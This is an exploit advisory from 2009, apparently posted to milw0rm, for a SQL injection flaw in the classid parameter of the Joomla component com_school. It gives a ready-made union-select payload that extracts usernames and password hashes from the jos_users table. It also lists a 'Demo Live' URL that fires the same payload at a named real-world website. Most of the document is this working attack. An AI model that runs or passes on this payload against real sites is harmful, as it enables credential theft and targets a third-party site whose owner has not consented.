----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################
________________________________________________________
Example:
http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>
<Sql Code>:
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------
<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>
# milw0rm.com [2009-06-08]